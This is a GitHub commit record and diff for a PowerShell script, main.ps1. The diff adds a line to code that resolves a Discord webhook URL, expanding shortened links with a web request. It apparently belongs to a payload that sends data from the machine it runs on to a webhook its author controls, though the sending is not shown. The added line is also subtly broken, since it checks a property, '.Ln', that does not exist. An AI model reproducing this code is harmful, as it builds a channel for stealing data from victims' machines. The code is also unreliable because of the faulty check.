Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:57:51 +00:00
committed by GitHub
parent d7cf45be95
commit 3cad5f63e4

View File

@@ -1,6 +1,7 @@
$whuri = "$dc"
# shortened URL Detection
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
if ($whuri.Length -lt 120){
$whuri = ("https://discord.com/api/webhooks/" + "$dc")
}
$outfile=""
$a=0